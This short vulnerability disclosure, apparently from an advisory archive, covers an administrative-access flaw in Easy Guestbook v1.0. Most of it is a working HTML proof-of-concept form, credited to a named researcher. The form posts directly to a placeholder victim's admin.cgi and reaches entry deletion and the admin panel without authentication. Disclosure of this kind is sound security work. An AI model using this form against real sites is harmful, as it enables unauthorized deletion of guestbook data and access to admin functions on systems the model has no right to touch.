Ben Chivers Easy Guestbook Administrative Access Vulnerability
The following proof of concept was provided by Arek Suroboyo <ar3su@yahoo.com>:

<html>
<body>
<h1>Easy Guestbook v1.0 Vulnerabilities</h1>
<form method="POST" action="http://victim/guestbook/admin.cgi">
Delete No. of Entries in Guestbook:
<input type="text" value="" name="function" size="5">
<input type="submit" value="Delete Message" name="delete_message" style="font-size: 10pt; font-family: verdana; font-weight: bold"><br><hr>
Open Administration Guestbook:
<input type="submit" value="Back to Admin" name="back_to_admin" style="color: #800080; font-weight: bold">
</form>
</body>
</html>